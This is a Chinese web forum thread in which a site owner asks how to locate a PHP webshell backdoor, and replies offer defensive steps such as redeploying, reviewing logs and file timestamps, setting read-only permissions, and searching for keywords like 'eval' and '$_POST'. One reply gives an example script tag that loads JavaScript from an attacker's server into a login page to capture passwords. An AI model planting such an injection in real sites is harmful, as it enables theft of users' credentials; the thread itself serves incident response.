这是一个创建于 3450 天前的主题,其中的信息可能已经有所发展或是发生改变。
网站被挂马留后门了,如何才能找到后门呢,求大神结合自己的经验给个思路
 |
1
whywhywhy 2014-11-14 18:22:22 +08:00
php这么灵活……基本没办法通杀。
所以要么找到特征批量的查找,要么……我也不知道 |
 |
2
GPU 2014-11-14 20:14:19 +08:00 via iPhone
删了源码重新部署应该是唯一的方法了
|
 |
3
gamexg 2014-11-14 21:15:03 +08:00
同 GPU 。
还得注意数据库里面有没有 xss ,否则对方还有可能拿到你的浏览器会话。 |
 |
4
msg7086 2014-11-15 07:11:09 +08:00
同 GPU 。
网站有木马基本靠重装。特别像论坛这种非常容易重装的程序,果断装个新的然后移植数据。 |
|
9
gamexg 2014-11-15 11:20:19 +08:00
一些网站后台允许修改网站名称、页头、页尾和广告。这个有些是储存到数据库的。
如果对方在里面加 <script src="http://对方的服务器上保存的脚本" type="text/javascript"></script> ,如果登陆页面插入了他的js,那么之后登陆用户的密码他都能轻松拿到的。 |
|
10
gamexg 2014-11-15 11:22:44 +08:00
无法大马,一句话一样可以搞的。
你要是图省事并且信任360之类的,就直接使用安全宝之类的服务吧... |
 |
11
vitozhang OP |
|
13
gamexg 2014-11-15 11:44:00 +08:00
搞错了,要是权限配置好,禁止增加、修改、删除网站文件是可以解决一句话的。
|
|
14
whywhywhy 2014-11-15 12:37:42 +08:00
@vitozhang 如果是被入侵后植入的,看看每个文件的修改日期,再检查……
如果是程序本身有漏洞 那基本没戏 查关键词或许有效 但是自从上次看了各种各样的php后面之后,觉得没戏了……因为php太灵活了。 |
 |
15
kookxiang 2014-11-15 14:10:01 +08:00 via Android
没办法的,PHP非常灵活,按关键字搜根本搜不到,只能用dz那种比对md5的办法人工处理
|
|
17
GPU 2014-11-15 15:21:00 +08:00 via iPhone
@vitozhang 你需要的不是怎么去查php里面的后门木马,而是完善的程序的漏洞,还是就是加强ssh的验证方式,比如证书登陆
|
 |
18
mengzhuo 2014-11-15 15:21:54 +08:00
strace抓原始操作
某司CTO曾经用这个方法抓到一枚3年前植入的webshell |
 |
22
shiny 2014-11-15 17:27:42 +08:00
我是这么处理的:
1、查找木马文件的 web 访问日志 2、查找该 ip 的其他操作,查找相关操作访问过的文件和 url。 3、如果没有相关 ip,可以翻下木马写入时间的web日志。如果网站规模小可以把那几天的日志都翻一下。 3、定位出漏洞所在位置 4、修补漏洞。 虽然理论上 不是 100% 有效,实践中效果不错。 |
|
23
shiny 2014-11-15 17:30:25 +08:00
对于高危 php 代码(类似 dedecms),还设想过这样的预警方式:整天 crond 扫描对比文件,如果有异常就发邮件通知。
不过常用防范手法用上后就没遇到过后门,也没去实践。 |
|
24
vitozhang OP @shiny 还会把日志留下的入侵真是有良心啊,其实不需要写的php文件可以将整个文件夹设置只读权限,但是cache目录是没法设置只读的,还是能写进木马去,并且cache目录下的php文件经常变化,没法扫描对比
|
 |
25
xifangczy 2014-11-15 19:26:24 +08:00
一句话木马是最难定位的,现在都是各种各样想都想不到的方式实现。
|
|
26
shiny 2014-11-15 19:31:07 +08:00
@vitozhang web 默认权限,入侵者删不了日志的……
你这种的话 cache 禁止执行 php(不影响 include 执行),然后排除掉 cache 目录就行了。 |
 |
27
taogogo 2014-11-15 22:38:16 +08:00
检查文件修改时间,看对应时间的访问日志,来确定浏览者是否从web漏洞突破的(如果有日志);
使用扫描工具扫文件修改时间和关键字,去掉其他后门; 检查是否有弱口令;是否有多余端口;是否有包含漏洞的应用 |
|
28
taogogo 2014-11-15 22:39:18 +08:00
低权限,read only,文件修改监控都可以保护你~
|
 |
29
konakona 2014-11-16 08:08:22 +08:00
=,,= 如果程序是你负责开发的倒还好..
1.创建时间/修改时间/文件权限(超高?) 基本上面这3个特征已足以.. 2.关键词搜“By”(很多人喜欢HACKING BY WHO WHO WHO ..) “eval” 、“$_POST”、“$_GET”(这2个如果多就说明你们没有对这些global进行封装的习惯,有点难排查=,,=)、“dirname”、“__FILE__” 你们想想还有啥? 3.观察php的log,看下有哪些不可能执行PHP的目录下有PHP代码运行。 |
 |
33
jungledrum 2014-11-16 11:37:19 +08:00
试试“网站安全管家”http://zhanzhang.anquan.org/ ,找黑哥要邀请码
|
|
34
vitozhang OP @jungledrum 谢谢推荐,瞧一下
|
 |
37
xwsoul 2014-11-18 22:15:20 +08:00
如果有版本控制..比如 svn or git
直接 svn status 或者 git status |
Select Language